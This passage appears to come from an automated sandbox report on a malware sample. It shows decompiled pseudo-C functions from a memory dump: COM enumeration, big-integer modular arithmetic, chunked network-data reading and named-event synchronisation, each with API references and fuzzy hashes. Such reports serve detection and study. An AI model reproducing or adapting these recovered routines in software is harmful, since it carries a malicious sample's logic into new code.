                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                                                    				short _v48;
                                                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                                                    				short _v64;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t54;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t56;
                                                                                                                                                                                                                                                                                    				intOrPtr _t57;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t58;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t60;
                                                                                                                                                                                                                                                                                    				void* _t61;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t63;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t74;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t76;
                                                                                                                                                                                                                                                                                    				intOrPtr _t78;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t82;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t86;
                                                                                                                                                                                                                                                                                    				intOrPtr _t102;
                                                                                                                                                                                                                                                                                    				intOrPtr _t108;
                                                                                                                                                                                                                                                                                    				void* _t117;
                                                                                                                                                                                                                                                                                    				void* _t121;
                                                                                                                                                                                                                                                                                    				void* _t122;
                                                                                                                                                                                                                                                                                    				intOrPtr _t129;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t122 = _t121 - 0x3c;
                                                                                                                                                                                                                                                                                    				_push( &_v8);
                                                                                                                                                                                                                                                                                    				_push(__eax);
                                                                                                                                                                                                                                                                                    				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                                                                                                                                                                                                                    				if(_t117 >= 0) {
                                                                                                                                                                                                                                                                                    					_t54 = _v8;
                                                                                                                                                                                                                                                                                    					_t102 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    					_t5 = _t102 + 0xa7b038; // 0x3050f485
                                                                                                                                                                                                                                                                                    					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                                                                                                                                                                                                                    					_t56 = _v8;
                                                                                                                                                                                                                                                                                    					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                                                                                                                                                                                                                    					if(_t117 >= 0) {
                                                                                                                                                                                                                                                                                    						__imp__#2(0xa792d0);
                                                                                                                                                                                                                                                                                    						_v28 = _t57;
                                                                                                                                                                                                                                                                                    						if(_t57 == 0) {
                                                                                                                                                                                                                                                                                    							_t117 = 0x8007000e;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t60 = _v32;
                                                                                                                                                                                                                                                                                    							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                                                                                                                                                                                                                    							_t86 = __imp__#6;
                                                                                                                                                                                                                                                                                    							_t117 = _t61;
                                                                                                                                                                                                                                                                                    							if(_t117 >= 0) {
                                                                                                                                                                                                                                                                                    								_t63 = _v24;
                                                                                                                                                                                                                                                                                    								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                                                                                                                                                                                                                    								if(_t117 >= 0) {
                                                                                                                                                                                                                                                                                    									_t129 = _v20;
                                                                                                                                                                                                                                                                                    									if(_t129 != 0) {
                                                                                                                                                                                                                                                                                    										_v64 = 3;
                                                                                                                                                                                                                                                                                    										_v48 = 3;
                                                                                                                                                                                                                                                                                    										_v56 = 0;
                                                                                                                                                                                                                                                                                    										_v40 = 0;
                                                                                                                                                                                                                                                                                    										if(_t129 > 0) {
                                                                                                                                                                                                                                                                                    											while(1) {
                                                                                                                                                                                                                                                                                    												_t67 = _v24;
                                                                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                                                                    												_t122 = _t122;
                                                                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                                                                    												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                                                                                                                                                                                                                                                                    												if(_t117 < 0) {
                                                                                                                                                                                                                                                                                    													goto L16;
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    												_t69 = _v8;
                                                                                                                                                                                                                                                                                    												_t108 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    												_t28 = _t108 + 0xa7b0bc; // 0x3050f1ff
                                                                                                                                                                                                                                                                                    												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                                                                                                                                                                                                                                                                    												if(_t117 >= 0) {
                                                                                                                                                                                                                                                                                    													_t74 = _v16;
                                                                                                                                                                                                                                                                                    													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                                                                                                                                                                                                                                                                    													if(_t117 >= 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                                    														_t78 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    														_t33 = _t78 + 0xa7b078; // 0x76006f
                                                                                                                                                                                                                                                                                    														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                                                                                                                                                                                                                    															_t82 = _v16;
                                                                                                                                                                                                                                                                                    															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                                                    														 *_t86(_v12);
                                                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                                                    													_t76 = _v16;
                                                                                                                                                                                                                                                                                    													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    												_t71 = _v8;
                                                                                                                                                                                                                                                                                    												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                                                                                                                                                                                                                                                    												_v40 = _v40 + 1;
                                                                                                                                                                                                                                                                                    												if(_v40 < _v20) {
                                                                                                                                                                                                                                                                                    													continue;
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    												goto L16;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								L16:
                                                                                                                                                                                                                                                                                    								_t65 = _v24;
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							 *_t86(_v28);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t58 = _v32;
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t117;
                                                                                                                                                                                                                                                                                    			}





































                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00A792D0), ref: 00A71404
                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00A714E6
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00A714FF
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00A7152E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String$Free$Alloclstrcmp
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1885612795-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c62d385551a7fa5271a0fcd880567f412320c292788c6a13de939d1688bda198
                                                                                                                                                                                                                                                                                    • Instruction ID: a590efbd46f410032ce3126f61241c74c6549cd69d635127d08daba7ba29b1be
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c62d385551a7fa5271a0fcd880567f412320c292788c6a13de939d1688bda198
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97513E75D00509EFCB04DFE8C9889AEB7B9FF89704B14C594E91AEB221D7319D42CBA0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                                                                                    			E00A71E91(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				void _v156;
                                                                                                                                                                                                                                                                                    				void _v428;
                                                                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                                                                    				unsigned int _t56;
                                                                                                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                                                                    				signed int _t79;
                                                                                                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                                                                                                    				void* _t92;
                                                                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                                                                    				signed int* _t99;
                                                                                                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                                                                                                    				signed int _t103;
                                                                                                                                                                                                                                                                                    				void* _t107;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t92 = _a12;
                                                                                                                                                                                                                                                                                    				_t101 = __eax;
                                                                                                                                                                                                                                                                                    				_t55 = E00A75278(_a16, _t92);
                                                                                                                                                                                                                                                                                    				_t79 = _t55;
                                                                                                                                                                                                                                                                                    				if(_t79 == 0) {
                                                                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                                                                    					return _t55;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                                                                                                                                                                                                    				_t81 = 0;
                                                                                                                                                                                                                                                                                    				_t96 = 0x20;
                                                                                                                                                                                                                                                                                    				if(_t56 == 0) {
                                                                                                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                                                                                                    					_t97 = _t96 - _t81;
                                                                                                                                                                                                                                                                                    					_v12 = _t96 - _t81;
                                                                                                                                                                                                                                                                                    					E00A72399(_t79,  &_v428);
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00A73C32(_t101,  &_v428, _a8, _t96 - _t81);
                                                                                                                                                                                                                                                                                    					E00A73C32(_t79,  &_v156, _a12, _t97);
                                                                                                                                                                                                                                                                                    					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                                                                                                                                                                                                                                                                    					_t66 = E00A72399(_t101, 0xa7a188);
                                                                                                                                                                                                                                                                                    					_t103 = _t101 - _t79;
                                                                                                                                                                                                                                                                                    					_a8 = _t103;
                                                                                                                                                                                                                                                                                    					if(_t103 < 0) {
                                                                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                                                                    						E00A72399(_a16, _a4);
                                                                                                                                                                                                                                                                                    						E00A7114C(_t79,  &_v428, _a4, _t97);
                                                                                                                                                                                                                                                                                    						memset( &_v428, 0, 0x10c);
                                                                                                                                                                                                                                                                                    						_t55 = memset( &_v156, 0, 0x84);
                                                                                                                                                                                                                                                                                    						goto L18;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    							_push(1);
                                                                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                                                                    							_push( *_t99);
                                                                                                                                                                                                                                                                                    							L00A77F56();
                                                                                                                                                                                                                                                                                    							_t74 = _t66 +  *(_t99 - 4);
                                                                                                                                                                                                                                                                                    							asm("adc edx, esi");
                                                                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                                                                    							_push(_v8 + 1);
                                                                                                                                                                                                                                                                                    							_push(_t92);
                                                                                                                                                                                                                                                                                    							_push(_t74);
                                                                                                                                                                                                                                                                                    							L00A77F50();
                                                                                                                                                                                                                                                                                    							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                                                                                                                                                                                                    								_t74 = _t74 | 0xffffffff;
                                                                                                                                                                                                                                                                                    								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t74 =  *_t99;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                                                                                                                                                                                                                                                                    						_a12 = _t74;
                                                                                                                                                                                                                                                                                    						_t76 = E00A75381(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                                                    							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                                                                    							if( *_t99 != 0) {
                                                                                                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							L13:
                                                                                                                                                                                                                                                                                    							_t92 =  &_v156;
                                                                                                                                                                                                                                                                                    							if(E00A745B4(_t79, _t92, _t106) < 0) {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                                                                    							_a12 = _a12 + 1;
                                                                                                                                                                                                                                                                                    							_t76 = E00A75936(_t79,  &_v156, _t106, _t106);
                                                                                                                                                                                                                                                                                    							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                                                                    							if( *_t99 != 0) {
                                                                                                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_a8 = _a8 - 1;
                                                                                                                                                                                                                                                                                    						_t66 = _a12;
                                                                                                                                                                                                                                                                                    						_t99 = _t99 - 4;
                                                                                                                                                                                                                                                                                    						 *(0xa7a188 + _a8 * 4) = _t66;
                                                                                                                                                                                                                                                                                    					} while (_a8 >= 0);
                                                                                                                                                                                                                                                                                    					_t97 = _v12;
                                                                                                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				while(_t81 < _t96) {
                                                                                                                                                                                                                                                                                    					_t81 = _t81 + 1;
                                                                                                                                                                                                                                                                                    					_t56 = _t56 >> 1;
                                                                                                                                                                                                                                                                                    					if(_t56 != 0) {
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L4;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                                                                                                    			}






















APIs
• _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00A71F44
• _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00A71F5A
• memset.NTDLL ref: 00A72003
• memset.NTDLL ref: 00A72019
Memory Dump Source
• Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
Similarity
• API ID: memset$_allmul_aulldiv
• String ID:
• API String ID: 3041852380-0
• Opcode ID: 0de52d06205a9ee514425df33ffebeef9e1d5f5830fb880739fcdc5e1c73fbb4
• Instruction ID: 2f3047092c0042a85331e9f8f7c5ac5908ec569d10e90953ac0f4ef0c5df2421
• Opcode Fuzzy Hash: 0de52d06205a9ee514425df33ffebeef9e1d5f5830fb880739fcdc5e1c73fbb4
• Instruction Fuzzy Hash: A741A032A00219AFDB10DF68CD41BEE77B9EF46310F00C56AF94DA7281DB709E458B91
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 56%
                                                                                                                                                                                                                                                                                    			E00A7467C(void* __eax) {
                                                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				char* _t40;
                                                                                                                                                                                                                                                                                    				long _t41;
                                                                                                                                                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t46;
                                                                                                                                                                                                                                                                                    				char _t48;
                                                                                                                                                                                                                                                                                    				char* _t53;
                                                                                                                                                                                                                                                                                    				long _t54;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                                                                    				void* _t64;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t64 = __eax;
                                                                                                                                                                                                                                                                                    				_t40 =  &_v12;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
                                                                                                                                                                                                                                                                                    				if(_t40 == 0) {
                                                                                                                                                                                                                                                                                    					_t41 = GetLastError();
                                                                                                                                                                                                                                                                                    					_v8 = _t41;
                                                                                                                                                                                                                                                                                    					if(_t41 != 0x2efe) {
                                                                                                                                                                                                                                                                                    						L26:
                                                                                                                                                                                                                                                                                    						return _v8;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                                                                    					L25:
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t64 + 0x30)) = 0;
                                                                                                                                                                                                                                                                                    					goto L26;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_v12 == 0) {
                                                                                                                                                                                                                                                                                    					goto L25;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_push( &_v24);
                                                                                                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                                                                    				if( *0xa7a148() != 0) {
                                                                                                                                                                                                                                                                                    					_v8 = 8;
                                                                                                                                                                                                                                                                                    					goto L26;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t45 = E00A75C4E(0x1000);
                                                                                                                                                                                                                                                                                    				_v20 = _t45;
                                                                                                                                                                                                                                                                                    				if(_t45 == 0) {
                                                                                                                                                                                                                                                                                    					_v8 = 8;
                                                                                                                                                                                                                                                                                    					L21:
                                                                                                                                                                                                                                                                                    					_t46 = _v24;
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *_t46 + 8))(_t46);
                                                                                                                                                                                                                                                                                    					goto L26;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L4;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                                                                    						_t48 = _v12;
                                                                                                                                                                                                                                                                                    						if(_t48 >= 0x1000) {
                                                                                                                                                                                                                                                                                    							_t48 = 0x1000;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
                                                                                                                                                                                                                                                                                    						if(_t48 == 0) {
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t55 = _v24;
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
                                                                                                                                                                                                                                                                                    						_t17 =  &_v12;
                                                                                                                                                                                                                                                                                    						 *_t17 = _v12 - _v16;
                                                                                                                                                                                                                                                                                    						if( *_t17 != 0) {
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L10:
                                                                                                                                                                                                                                                                                    						if(WaitForSingleObject( *0xa7a2c4, 0) != 0x102) {
                                                                                                                                                                                                                                                                                    							_v8 = 0x102;
                                                                                                                                                                                                                                                                                    							L18:
                E00A72A03(_v20);
                if(_v8 == 0) {
                    _v8 = E00A76589(_v24, _t64);
                }
                goto L21;
            }
            _t53 =  &_v12;
            __imp__( *((intOrPtr*)(_t64 + 0x18)), _t53);
            if(_t53 != 0) {
                goto L15;
            }
            _t54 = GetLastError();
            _v8 = _t54;
            if(_t54 != 0x2f78 || _v12 != 0) {
                goto L18;
            } else {
                _v8 = 0;
                goto L15;
            }
        }
        _v8 = GetLastError();
        goto L10;
        L15:
    } while (_v12 != 0);
    goto L18;
}



















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A7479C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A74710
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000), ref: 00A74720
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A74740
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$AllocateHeapObjectSingleWait
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 35602742-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f34629cf398cae7d15573adb992565a930190f435abf896a412d14f5aa0dc622
                                                                                                                                                                                                                                                                                    • Instruction ID: ad91da7a9dc4b314b8877e571e7909dd43cbfbaac502ea97f9268a4792b9cff9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f34629cf398cae7d15573adb992565a930190f435abf896a412d14f5aa0dc622
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E34115B4D01209EFDF14DFA4CD889AEBBB9FB49341F60C46AE50AE6150E7309E81DB11
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                                                                    			E00A74CD5(signed int _a4, signed int* _a8) {
                                                                                                                                                                                                                                                                                    				void* __ecx;
                                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                                    				signed int _t6;
                                                                                                                                                                                                                                                                                    				intOrPtr _t8;
                                                                                                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                                                                    				signed int* _t27;
                                                                                                                                                                                                                                                                                    				signed short* _t28;
                                                                                                                                                                                                                                                                                    				CHAR* _t30;
                                                                                                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t6 =  *0xa7a2c8; // 0xbd092303
                                                                                                                                                                                                                                                                                    				_t32 = _a4;
                                                                                                                                                                                                                                                                                    				_a4 = _t6 ^ 0xd05b5869;
                                                                                                                                                                                                                                                                                    				_t8 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    				_t3 = _t8 + 0xa7b84d; // 0x61636f4c
                                                                                                                                                                                                                                                                                    				_t25 = 0;
                                                                                                                                                                                                                                                                                    				_t30 = E00A71970(_t3, 1);
                                                                                                                                                                                                                                                                                    				if(_t30 != 0) {
                                                                                                                                                                                                                                                                                    					_t25 = CreateEventA(0xa7a2d4, 1, 0, _t30);
                                                                                                                                                                                                                                                                                    					E00A72A03(_t30);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t12 =  *0xa7a2b4; // 0x4000000a
                                                                                                                                                                                                                                                                                    				if(_t12 != 6 || _t12 < 2) {
                                                                                                                                                                                                                                                                                    					if( *_t32 != 0 && E00A719E7() == 0) {
                                                                                                                                                                                                                                                                                    						_t28 =  *0xa7a124( *_t32, 0x20);
                                                                                                                                                                                                                                                                                    						if(_t28 != 0) {
                                                                                                                                                                                                                                                                                    							 *_t28 =  *_t28 & 0x00000000;
                                                                                                                                                                                                                                                                                    							_t28 =  &(_t28[1]);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t31 = E00A763CD(0, _t28,  *_t32, 0);
                                                                                                                                                                                                                                                                                    						if(_t31 == 0) {
                                                                                                                                                                                                                                                                                    							if(_t25 == 0) {
                                                                                                                                                                                                                                                                                    								goto L21;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                                                                                    							if(_t31 == 0) {
                                                                                                                                                                                                                                                                                    								goto L19;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                                                                    					_t27 = _a8;
                                                                                                                                                                                                                                                                                    					if(_t27 != 0) {
                                                                                                                                                                                                                                                                                    						 *_t27 =  *_t27 | 0x00000001;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t31 = E00A77836(_t32, _t26);
                                                                                                                                                                                                                                                                                    					if(_t31 == 0 && _t25 != 0) {
                                                                                                                                                                                                                                                                                    						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t27 != 0 && _t31 != 0) {
                                                                                                                                                                                                                                                                                    						 *_t27 =  *_t27 & 0xfffffffe;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L19:
                                                                                                                                                                                                                                                                                    					if(_t25 != 0) {
                                                                                                                                                                                                                                                                                    						CloseHandle(_t25);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L21:
                                                                                                                                                                                                                                                                                    					return _t31;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                                                                    0x00a74d7e
                                                                                                                                                                                                                                                                                    0x00a74d7e
                                                                                                                                                                                                                                                                                    0x00a74d7e
                                                                                                                                                                                                                                                                                    0x00a74d84
                                                                                                                                                                                                                                                                                    0x00a74d86
                                                                                                                                                                                                                                                                                    0x00a74d86
                                                                                                                                                                                                                                                                                    0x00a74d90
                                                                                                                                                                                                                                                                                    0x00a74d94
                                                                                                                                                                                                                                                                                    0x00a74da6
                                                                                                                                                                                                                                                                                    0x00a74da6
                                                                                                                                                                                                                                                                                    0x00a74daa
